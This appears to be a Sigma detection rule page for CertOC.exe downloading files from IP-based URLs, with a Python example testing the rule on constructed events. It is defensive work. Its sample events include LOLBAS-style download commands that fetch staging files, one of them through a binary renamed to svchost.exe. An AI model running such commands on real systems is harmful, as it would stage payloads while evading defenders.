File Download From IP Based URL Via CertOC.EXE
Detects when a user downloads a file from an IP based URL using CertOC.exe
Sigma rule

title: File Download From IP Based URL Via CertOC.EXE
id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a
related:
    - id: 70ad0861-d1fe-491c-a45f-fa48148a300d
      type: similar
status: test
description: Detects when a user downloads a file from an IP based URL using CertOC.exe
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Certoc/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-18
tags:
    - attack.command-and-control
    - attack.execution
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\certoc.exe'
        - OriginalFileName: 'CertOC.exe'
    selection_ip:
        CommandLine|re: '://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
    selection_cli:
        CommandLine|contains: '-GetCACAPS'
    condition: all of selection*
falsepositives:
    - Unknown
level: high
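The rule's three selections evaluated over a handful of process_creation events, to show which invocations fire and which do not. This is an added example written for this page, not code from the SigmaHQ project; the events, the command lines and the IP addresses (RFC 5737 documentation ranges) are constructed for illustration.

```python
import re

# Sigma string modifiers (endswith, contains, plain equality) compare
# case-insensitively; the `re` modifier is a raw regex and is case-sensitive.
IP_URL_RE = re.compile(r'://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')


def selection_img(event: dict) -> bool:
    """selection_img: Image ends with \\certoc.exe OR OriginalFileName is CertOC.exe."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith("\\certoc.exe") or original == "certoc.exe"


def selection_ip(event: dict) -> bool:
    """selection_ip: the command line carries a '://<dotted-quad>' URL."""
    return IP_URL_RE.search(event.get("CommandLine", "")) is not None


def selection_cli(event: dict) -> bool:
    """selection_cli: the command line contains -GetCACAPS (case-insensitive)."""
    return "-getcacaps" in event.get("CommandLine", "").lower()


def matches_rule(event: dict) -> bool:
    """condition: all of selection*"""
    return selection_img(event) and selection_ip(event) and selection_cli(event)


# Constructed process_creation events (not real telemetry). Field names follow
# the Sigma Windows taxonomy used by the rule.
SAMPLE_EVENTS = [
    {   # straightforward invocation: all three selections hit
        "id": "evt-1",
        "Image": r"C:\Windows\System32\certoc.exe",
        "OriginalFileName": "CertOC.exe",
        "CommandLine": r"certoc.exe -GetCACAPS http://192.0.2.10/stage.txt",
    },
    {   # binary copied and renamed: OriginalFileName still identifies it,
        # and the lower-cased switch still satisfies the case-insensitive contains
        "id": "evt-2",
        "Image": r"C:\Users\Public\svchost.exe",
        "OriginalFileName": "CertOC.exe",
        "CommandLine": r"svchost.exe -getcacaps https://198.51.100.7:8443/a",
    },
    {   # same download from a hostname: selection_ip does not fire
        "id": "evt-3",
        "Image": r"C:\Windows\System32\certoc.exe",
        "OriginalFileName": "CertOC.exe",
        "CommandLine": r"certoc.exe -GetCACAPS https://pki.example.com/caps",
    },
    {   # IP URL present but no -GetCACAPS switch: selection_cli does not fire
        "id": "evt-4",
        "Image": r"C:\Windows\System32\certoc.exe",
        "OriginalFileName": "CertOC.exe",
        "CommandLine": r"certoc.exe http://203.0.113.5/stage.txt",
    },
    {   # a different tool fetching from an IP: selection_img does not fire
        "id": "evt-5",
        "Image": r"C:\Windows\System32\curl.exe",
        "OriginalFileName": "curl.exe",
        "CommandLine": r"curl.exe http://203.0.113.5/stage.txt -o stage.txt",
    },
]


def evaluate(events=SAMPLE_EVENTS) -> list:
    """Return the ids of the events the rule would alert on."""
    return [e["id"] for e in events if matches_rule(e)]


if __name__ == "__main__":
    print(evaluate())  # ['evt-1', 'evt-2']
```

Two things worth knowing before deploying it: the `re` pattern accepts any four dotted groups of one to three digits, so it also matches octets above 255 and it misses IPv6, decimal and hexadecimal IP notations, while the `contains` on `-GetCACAPS` is what keeps a plain IP URL passed under another switch (evt-4) out of scope. Downloads from a hostname (evt-3) are deliberately not covered here; that is the reason the rule is listed as only similar to 70ad0861-d1fe-491c-a45f-fa48148a300d rather than a duplicate of it.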
References
- https://lolbas-project.github.io/lolbas/Binaries/Certoc/
Related rules
- DarkGate - Autoit3.EXE File Creation By Uncommon Process
- Command Line Execution with Suspicious URL and AppData Strings
- Greenbug Espionage Group Indicators
- Potential DLL File Download Via PowerShell Invoke-WebRequest
- Potential In-Memory Download And Compile Of Payloads